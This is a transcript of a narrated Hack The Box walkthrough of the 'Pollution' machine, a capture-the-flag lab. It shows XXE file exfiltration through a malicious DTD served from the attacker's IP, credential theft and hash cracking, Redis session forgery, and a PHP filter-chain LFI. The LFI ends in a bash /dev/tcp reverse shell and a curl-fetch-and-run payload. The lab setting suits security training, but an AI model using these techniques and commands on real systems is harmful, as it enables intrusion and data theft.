Well, hello everyone, welcome back guys. Hope you all are doing well. This is Mohammad Badruddja and today we are going to solve a machine from Hackthebox. The machine name is Pollution and the difficulty level of this machine is hard. So without wasting time, let's go and we start the machine by scan. So I did nmap scan, which is nmap as always space hyphen s capital V for version enumeration, space hyphen s capital C for default scripts, and the target IP is going to be 10.10.1.192 space hyphen O capital N, and I want to save the results in a file named as default.nmap. So when I did that scan, it just gave me two ports, port number 22 and port number 80. And once I go to look at that port, I proceed with that, but later on I stuck very badly because I missed here one thing, because nmap scan didn't give me one port which belongs to Redis. So I came back to scan the target again, and this is one of my biggest mistake while I was solving this machine. I usually do all 65,535 port scan with the nmap by specifying the switch, let's say space hyphen s capital V space hyphen s capital C and hyphen P hyphen like this, and then the IP address of the target. So I did it in the background always, but while solving this machine I forget to do that, and later on I regret that. So once I did the whole 65,535 ports scan, I found one Redis port also open. But here for easy and for the time limitation, I also want to mention one more tool, which is Rust Scan. This is a very powerful tool, and I frequently use this tool in my real life penetration testing a lot. I use this tool a lot, Rust Scan space hyphen A and the target IP. So this is very fast. If I show you here, this is very fast. You can see here it detected port number 22, port number 80, and here it mentioned one more port which nmap scan did not give me. So 66379, this port. So what I did, I just ran the command which is rust scan space hyphen A, and the target IP is going to be 10.10.1.192, and I save the result of this scan in a file named as rustscan.txt. So if I show you the scan result for rust scan, so this is the result, okay, and here as you can see it gave discovered open ports like port number 22, 6379, this is for Redis, and port number 80 for HTTP, and eventually it scan all these ports or these discovered port by nmap scan. So here as you can see, port number 22 SSH, port number 80 HTTP, and port number 3679, this belongs to Redis. So this is the scan story. Next thing is here you can also see the scan result. Now if I go here in my browser, I just open it by the IP address, and once I scroll it down, so in the last you can see we find one valid email which is info@collect.htb, and we found the domain name which is collect.htb. So I already created a record in my etc host file by name collect.htb, so that here I can access this application with the name collect.htb. Second thing is it's always better to have some enumeration in the backend, so I'm going to use fuf for the subdomain enumeration. So fuf space hyphen w for the word list, user, share, sec list, and inside sec list there is discovery, DNS, and subdomain top 1 million, and I want to specify the URL which is going to be u with the u switch http:// collect.htb, and I want to specify a header that's going to be -h, and inside it I'm going to specify host, and whatever you want to fuzz you must mention that fuzz. So because I'm enumerating the subdomain, so subdomain name is going to be fuzz, and then the domain name, which is going to be collect.htb, like this. And then I'm going to say nothing, just hit enter and control C. Why control C? Because here all the results you can see its status is 200, right? Its status is 200, and also the size is same and words are same. So I'm going to filter this result by size 26197. So I'm going to clear it and space hyphen fs 26197. Is that it? Space hyphen t 100. Let's see. Yeah, and here we go. Now what I did, I filter the size with this, so it is not going to show us any response with this size. And here, as you can see, we found two subdomains like forum and developers. So it is going to be something like, if I come rest, I don't need that, port number 22, port number 80, and port number 6379. This is Redis. Now we found forum subdomain, so it is going to be fully qualified domain name is going to be forum.collect.htb and developers.collect.htb. These two subdomains we got, right? Okay. I already created record in my etc host file with these names, fully qualified domain names for the subdomain. I created record, and now let's go and try to figure it out what's running on these. So forum.collect.htb, hit enter, and I'm also going to open developers.collect.htb. So let's see what's inside forum. There is some kind of application which is mybb from mybb group. I don't know what it is. First time I saw this application. Here in the developers subdomain, we found here basic authentication, and we do not have any credentials up to now. Although I tried a bunch of default credentials like admin password, something like this, but nothing worked. So back to the home, I see page source. Where is it? View page source, and in the page source found not much interesting things. So just cancel this one. Important information is here in the webalizer. So in the webalizer, we can see font scripts are these. It's using Google font APIs, CDN, content delivery network JS deliver, miscellaneous popper. It's using JavaScript jQuery, Lightbox. Okay, but most important part is this. It's using web server, Apache HTTP server, and the programming language it's using is where is it? Programming language was PHP, and the target operating system is Debian. Okay, so with this information keeping in mind, go forward. We can here register a user. So I'm going to register a user, let's say cybersec, and the password is going to be, let's say 123456. Sign up. Okay, now the user is registered. Now what I'm going to do, I'm going to log in with that user. So cybersec, and the password is 123456. Hit enter. And we logged in. So there are some features like it's saying cybersec welcome to pollution API. It's using some kind of API, a cleaner word. We don't know what it is. So it's saying we work with the main technology, which is Google Maps, AWS, Google Analytics, and IA. With pollution API, you can monitor the environmental area of the certain area. So this is an API which is going to perhaps going to tell you that air quality, if there is any storm, if there is any rain, some kind of weather API, environmental monitoring, graphic generator, analyze graphics, something like this. Features, we already have features, nothing much here. Okay, but we found here something like object. Okay. Next thing, move to the forum. So if we go to the member list, so here we go, and in the member list we found all these members. These are maybe the users or members. Okay, these are some kind of post counts and threads count. Let's go to John, and this account is not activated, but I'm going to see what posts are there. Okay, these are the posts. What is the purpose of the pollution API? Okay, there is also option to log in and register a user, so it's better to register a user. I'm going to register it. I agree, and let's say I'm going to say hell is the username. Password is going to be 123456 123456. Let's say hell at well.xor and confirm this. So hell at well.xor. okay, 2 plus 2 equal to 4, and just submit registration. So we are now registered our email and we are already logged in. So go back to the collect forum. I'm going to that with the member list because I want to also see what user did what. Okay, all 5 threads. What is the purpose of it? So it's saying the objective is to monitor pollution in a given geographical area. Okay, that's it. Back reply pollution API. Okay, this is the same thread. Wait, not the same thread, I think. Any forecast to pollution API to be ready. Instead of asking, you can go okay, that's it. Forum, back to the next user. Let's just okay, come back here, member list, and this time let's go to the Victor user, and this user account is activated, and this is junior member. All threads, total posts are 4. I had problem with the pollution API. So let's see. Hello, I am unable to log in to the pollution API. Can someone help me? So there is system admin. He is also a member of junior member. Hello, can I see the requests that were made to the API? So it's saying, yes, I will leave my proxy request history attached to this post. And there is a file named as proxy_history.txt. Let's open this file. And here also the system admin is mentioning that the pollution API works with JSON. I saw that in your request the content type needs to be changed to application/JSON. So this is the proxy history for the request what Victor did, and because Victor cannot access the API, so he sent the proxy history, all the requests and responses in a file named as proxy_history.txt, which is here. And once system admin analyzed this file, he said that okay, API work with the JSON, so you need to change the content type header in the request. So if we come here, there is one interesting endpoint which is set role admin. So this is maybe to give any user a role as administrator, and this is base 64 because here it's saying base 64 equal to true. So what I'm going to do, I'm going to copy this, Control C, back here and clear that. Next thing is I'm going to say echo space -n, paste that, and base 64 space -d to decode that, hit enter, and this is the request. So you can see here the content type. Where is content type? So the content type is application/wx forum URL encoded, and this is the reason why Victor cannot access, or Victor cannot uh, successfully make this request, because the content type must be JSON, application/JSON, right? So I'm going to keep this request with me, and this is very interesting. Why? There are three reasons. The first reason is we found one hidden endpoint, which is set role admin, and this is very sensitive because maybe this is a post request first of all, and with that endpoint we can give our user as admin privileges. Okay, we can provide admin privileges to our user. Also we have here the session ID for the Victor, and we have the token. So if we make a request to this endpoint using this session ID and this token, we can get the session. Okay, so that is why this is very, very important and sensitive information. So I'm copy this here. Now let's go back to the collect application, this one. We already have, let's see. So if I right click, go to inspect, go to storage, and here we have session ID. This is our session ID with user cybersec. Okay, so what I'm going to do here, I'm going to change this session ID with this one. Copy that, come back here, paste that, and I want to also add one more field here, and the value is going to, the name is going to be token, and the value is going to be this. So copy that, paste that, hit enter. Now I'm going to enable the burp proxy on my browser, and let's just make this request, hit enter, come back to the proxy history. This is the request. Okay, I'm going to send this request to the repeater, and come back to the repeater, change it to the post request, and here what I'm going to do, first of all, I'm going to set role admin. Okay, second thing, we need to put the token value. So this is going to be the token. Copy and paste it here. Okay, let's just send this and see what we have. We have /home. It is going to redirect us to the same endpoint where we were before, and if we follow redirect, it is going to say login again. So back here again, and instead of this xwww forum form URL encoded, I'm going to say here JSON. Let's try it again. Still home, no benefit. Let's see, cookies. Here we have both of these. Let's log in again. So log in with the cybersec, and the password is 123456. Hit enter, don't save. So it brings us to the home, and nothing changed here. Back to the proxy again. Let's go to this request, home, and there we have the token. Let's send this request to the repeater. Go to the repeater and set /role/admin. Change this request to the post request and put the token value like this. Hope for the best. Send it again, and as you can see, this time the endpoint gets changed. So now it's redirecting us to the location /admin. So if we follow redirect, and this is the page now, and here you can see we have title administration. So here up to now we don't have administration section, but now we have it. So let's go back to the burp suite, and here I am going to show response in the browser. Copy that, come back here, and let's just paste that, and make sure while you are doing this, your burp proxy must be enabled on the browser, otherwise you won't be able to see that response. Okay, now we are in the admin endpoint, and if we see the cookie, here we have both. Okay, so now we are in the administration section. Here, as you can see, hello cybersec, welcome to the administration of collect. And here, if we click on administration, or if we scroll down, administration lead us nowhere, but if we scroll down, here we can register a user in the pollution API. That means this application, what we used before in the /home endpoint, that was just a website or a little web application where you cannot access any pollution API feature. But with this account, with this token and the session ID, which belongs to Victor maybe, so Victor can actually register a user for the pollution API, and here we have that section of administration. So now we can register a user for the API. So I can say API underscore user, and the password is 123456. Okay, check me out. Registered successfully. Check me out. So user registered successful. Okay, submit it again. User registered successful. Every time it's saying user registered successful. If we go back here to the proxy, let's see what this request is all about. And here we can see easily there is one interesting thing. This is the endpoint for /API. The request method is post, but the interesting part here is this manage API, which is the post data, and this post data is in the form of XML. So whenever I see this in the request, I immediately go and try the XXE. So that may be vulnerable to XML external entity, XXE vulnerability. So let's go and we try what? XXE exploits. I had already recorded a whole section of Web Security Academy from the Portswigger of XML external entity injection vulnerability. So I will share the link, and you can go and see all type of XXE vulnerability injection vulnerability. So the best place to go is whether Hackthebox, or I'm directly going to payloads, all the things, XXE. So XXE injection, I'm going to exploiting blind XXE to exfiltrate data using malicious external DTT. Let's see this one. Oh, it again bring us to the Portswigger. Here we go. Exploiting XXE to perform SSRF attack. Okay, I need this one. So I'm going to copy this, Control C, and come back here, create one more file, and I'm going to paste that. Okay, now everything is okay, just creating the DTD file. So I'm going to save it as, let's say, malicious.dtd. okay, hit enter. Now the thing is, file non-existing, here instead of file I'm going to say HTTP, because I'm going to send this file from my HTTP server. So my IP is 10.10.14.174, and here let's say I'm going to put one parameter, which is file is equal to percentage file, and okay, this is okay. Now you can also change here the name. I'm going to say it xfiltrate, okay, and the same name I'm going to call here with the percentage xfiltrate. Eval is okay, and here I'm going to read etc passwd file. Fine, so save it, come back here in the browser or here. Let's do one more thing. What I need to pass is this. Here I'm gonna say doc type, and doc type let's say foo. Here I'm gonna say entity is going to be percentage xxe, or anything you want, you can put it here. Okay, then again system, and with the system I'm going to mention here http://10.10.14.174/ here I'm going to say okay, grab the file malicious.dtt file. Okay, and after this percentage xxe and colon. I think that's it. And now we want to mention this one here after this XML version and encoding. Sorry, first of all I need to send this request to the repeater, and here I'm going to put that. Before sending this, I'm going to start the Python server on my machine. So python 3 http.server on port number 80, and let's send this request and see what happened. So as soon as I send this request, we get here some error, but if we go back, you can see it is calling our file DTD file. But the thing is, in the DTD file we mention here that we want to read this etc passwd file. So if it reads successfully, we are going to get here the content of the etc passwd file, but we did not get the content. So maybe we have to mention here the PHP filters. We need to use the PHP filters. So instead of file, what I'm going to do, I'm going to say PHP //filter/convert dot base 64 and hyphen encode / resource is equal to etc passwd file, like this. Okay, PHP filter convert dot base 64 hyphen encode. So it is going to encode the content of passwd file in the base 64. Then we have to decode the content. So let's try it one more time. Send this. Here we get the error. Here again we get a hit of malicious. It's taking malicious.dtd file, but we are not getting here any content. So maybe we won't be able to read etc passwd file. Okay, let's try some other file. Let's say etc host. Save it and go to the burp proxy. Send it again back to the terminal, and here as you can see status is okay. So status okay, but we did not get anything. Status okay, but we did not get anything. Let's try to read, because it's using PHP. Let's try to have index.php, because we know that index.php is going to be the first file, and mostly 99% we found index.php in the PHP application. So you can do like this, or you can go and do the file enumeration. Okay, save it and back here, send this again, come back here again. We did not get anything, so let's try this. I need to see http colon, oh come on, this is the issue maybe. File is equal to percentage file and seems okay. Let's do here a few more changes like this, save it again, exfiltrate. Actually this is the issue, so come on man. Mostly spelling mistakes, sorry about that. Control S, come back here again and send this. Okay, and here this time we get some base 64 content, so I'm going to copy these and come back here, clear it, and I'm gonna say echo space hyphen n, paste that, and pipe space base 64 space hyphen d to decode, and this is the content of index.php file. So the first thing is it started with the php tag and it requires bootstrap.php. So we need to look into this file also. We are going to read this file also, and there are register.php, home.php, admin.php and api.php too, and inside controllers there is set role to admin.php. Fine, so I'm going to copy this, copy, come back here, and I'm going to paste that, save. So let's go and we need to see what's inside bootstrap.php. So copy this path, go to the malicious.dtd, and instead of index.php paste that path, save it, come back here and just send the request, because we already put this here, we don't need to change every time. So just send the request back to the proxy server, and again we get some base 64 encoded content. So I'm going to copy this, come here again, clear it, and echo space hyphen n, paste base 64 space hyphen d, and there is something interesting. First of all, I'm going to copy, come back here, and paste that. So if we scroll up, this is the content of bootstrap file, and here as you can see we found one connection string with the password, with the authentication password of collector Redis password. So this could be the password for the Redis service to log in, to authenticate, but there is no username. And one interesting fact about Redis is while you are installing and configuring the Redis, the default username is default. So if you want to just authenticate the Redis service with the password, so the user is default and you don't need to pass the username, you just need to pass the password. Okay, this is the thing. So we have the password for the Redis service. Now what we can do, let's just come back here, vertical, and you need to install Redis CLI to access that, and space hyphen h for the host, and then 10.10.11.192, this is the target IP, space hyphen ask pass, PASS, hit enter. Now it's asking for the password, and here we have the password, Control C, Control Shift V, hit enter, and we are now connected with the Redis. So if I go to say info to see the information of this Redis, so there are bunch of information. The first thing, the replication, in the replication section you can see the role is master. Okay, if we scroll up, so these are the information about memory and rest of the things. If you want to get the configuration, so you can say config get and start to get the whole configuration. And in the configuration you can also see there is password, it require password. Next thing, there is the directory for the Redis library. This is the path for that. The server logs are here in this path. You can read this file. You can try to read this file. And important information here is you can see the TLS cipher suit. There is no configuration about it, but the session caching is yes. And authentication clients, yes, because we need authentication. Cluster and rest of the things are there. Important information, I would say. Okay. Server PID. Okay, let's say we can also try client list. What are the clients there? So this is the client, and as you can see the user is default, as I mentioned before. Now the thing is, if we come back to the developers subdomain, developers.collect.htb, we see here that basic authentication it requires. In basic authentication, you need to configure .ht password file, right? And this is the subdomain for developers. So we can consider it like slash inside var slash www slash developers. This is going to be the root directory for this application for the subdomain developers. Okay. Similarly for collect, var slash www slash collect, something like this. For forum subdomain slash var slash www slash forum, something like this. So because it is asking the basic authentication for the developers, so we can go and we can try to read htpasswd file, because the password is going to be configured here. So I'm going to take this path, and in the malicious DTD file I am going to paste this path, paste it, save it, and let's go and try again. Okay, try again, come back here, send again. Okay, here we have error, but if we go to the terminal we get something. So I'm going to take this, control shift copy, and echo space -n, paste that, close it, base 64 space -d, hit enter, and there we have the user and its hash. So I'm going to copy this and paste it here, paste that here. Now what I need to do here is just copy this and come back here. Let's say nano dev hash, hit enter and paste that hash here, control O, enter, control X, clear it. And if we go to crack this hash, so I'm going to use hashcat space -m, and the ID is 1600. You can go to the hashcat wiki. I will share the link where you can just search this part of the hash by control F. I'm going to show you. Let's show it here. Hashcat wiki sample hashes, example hashes. Okay, now control F and come back here, copy this one back here and paste it here. So you can see the 1600 is the ID for this. So back here, hashcat space -m 1600, dev hash is the file where we save the hash, and slash user share word list and rocky.txt, hit enter. Okay, so now because it's already cracked, I think, so what we can do, we can try space hyphen hyphen show. No. Why so? Because maybe I also, come here, dev hash, we don't need to put this one here, save it and back again to the terminal, clear that, and let's try one more time. Now it's saying space hyphen hyphen show because I already cracked this hash once. So clear it again and hyphen hyphen show, hit enter. So the password is rocket. Come back here, we don't need that, come back here, and the password is going to be R0 CKET rocket. Okay, so back to the developer subdomain, and here I'm going to mention the developers underscore group. This is the username and the password is R0 CKT. Hit enter. Don't save. And now we are redirected to another login page, and we don't know what this login page is all about. If we inspect that, go to the storage, let's see, we have one PHP session ID. So we have access of Redis, and we have access now for the developers subdomain application, developers application, and we have one session ID. I'm going to copy this session ID and back to the Redis. So here what I'm going to do, I'm going to set PHP Redis underscore session, and going to put the session ID what we found from the developers, and then it's mentioning value. So in the value section, what I'm going to do here is, let's say in the quotes, username, this is actually the serialization. S, how many number of characters are there? So 3, and let's say A. Then we need to mention the role. So role is going to be, let's say, or should I, okay, I'm going to copy this one, come back here. First of all, we write it here, and then we go to just paste it. So paste that here up to we are here, let's say S, and I'm going to say 5, and the role is going to be admin / close it, and then let's say auth, because it uses authentication. Okay, instead of comma put this. So auth is going to be S, 4 characters are there, and the value is going to be true, like this. Okay, so and then semicolon. This is going to be the command. So what actually I'm doing, I'm saying there is a username AAAA. This is created by me. Its role is going to be admin, and authentication is going to be true. Copy this back here, Control C, clear that, and connect it one more time. Password is, where is the password? This is the password. Copy, paste that here, hit enter, and back here again, copy and paste this. So why I set session ID here, this is the session ID belongs to this developer application. So I'm going to create a user named as AAAA, and putting this session ID, associate this session ID with that user and put that AAA user role is admin, and it is going to be authenticate. So authentication is equal to true. Okay, just hit enter. Now the status is okay. That means we are ready to go. Now what we can do, if we come back here and take out this login, because we created a user, give it the permission to authenticate is equal to true, and set this user as administrator. So now this session ID is associated with that user. If I just refresh this page, so now as you can see, we are logged in. So that means this application is associated with the Redis service, and there is home, and the parameter is page. So once I see that, I try LFI, and if you try LFI, it is not going to work like this. /etc/passwd, hit enter, and as you can see, that works, but we did not get anything. Even if we go to see the page source, there is nothing. Okay, so what I did next, let's try again the same thing, which is PHP filter chain. And I try the PHP filter chain same like what I tried in the malicious DTD file, but that is not exactly going to work because it's using different filter chains. So enumeration is the key. We can go to payload all the things, payload all the things, PHP filter chain. Okay, so there is one GitHub repository where there is a Python script to generate the payload with the filter chains. So you don't need to manually write it, it will generate it automatically. And this is the Python file. So I'm going to see it in raw, and just Control A to copy, Control A to select all, copy. We don't need malicious DTD, paste it here, Control S, and let's say PHP filter chain.py. Hit enter. Now come back here and come back here. We don't need that. Clear this. So Python 3 space PHP filter chain. Hit enter. Nothing is there. Let's see, space -h. Okay, so we need to mention the chain, and then we need to set the payload, whatever we want to generate. So space -chain, and I'm going to put here let's say ID like this is equal to, fine, that seems okay. Let's now hit enter. Parse/n. Why so? Okay, because I need to mention it in the codes. Hit enter. Now it's generated. As you can see, PHP:// convert icon v UTF-8. So it's already generated that payload. Control C and come back here, go to the developer and put the value of page parameter to this and hit enter. So let's see if we successfully executed the command, and as you can see, we successfully executed the command. So if we executed the command here, we can get the reverse shell. So for reverse shell, what you can do, let's say come back here and Control-Shift-C, put it here, and here you can put the command. So what I'm going to do, I'm going to say bash space hyphen I, and then greater than and slash dev slash tcp slash my IP is going to be 10.10.14.174 slash on port number 7575, 0 greater than and 1. Okay, so let's try to execute this. Copy, come back here, clear it and paste that. Before executing this, make sure we started here netcat listener, so nc space hyphen nlvp port number 7575. Back here and execute this command. Oh, again the same problem, because we did not enclose it within the quotes, so make sure you put it inside the single quotes. Copy this again, paste it, hit enter. Now copy this, control C, back here, and instead of that, paste it, hit enter again. Request URI too long, so it is not going to work. It's saying you must put the small payload. So the second thought is we can create a bash file here, slash bin slash bash, and we put the same thing here, which is this. Copy and paste it here and save it as rev.sh. Hit enter. Now what I'm going to do here is instead of that, I'm going to say curl http, or just put the IP, okay, colon 80. Already we don't need to mention this port 80, and then let's say rev.sh. This is going to be the file. It is going to take this file and then execute it with the bash like this. So first of all, we need to start the Python server here. Come on, exit, horizontal, let's say python 3 space hyphen m http dot server on port number 80. Okay, and now let's generate this filter chain payload. So copy that, come back here, paste it, hit enter. Now we need to copy this up to here, control shift C, back here, and we need to delete that, paste it, hit enter. Back to the terminal, and here as you can see, it gets the reverse shell, reverse.sh file, and we get here the reverse shell as www data. So who am I? I am www data, ID is www data. So for this video, that's it, because it is going to take too long. In the next video, we will escalate our privileges from this www data user to another user. Let's see how many users are there. Those can run bin bash, so slash bin slash bash from etc pass wd. So there is Victor user and root user. So in the next video, we are going to escalate our privileges from www data user to Victor user. We will get the flag and then we move to the root user. So that's it for this video. If you like the content, please like, subscribe and share. I'm going to share all the links in the description section, what I have used here, all the scripts what we use, and about XXE injection, everything. So that's it. See you in the next video. Bye.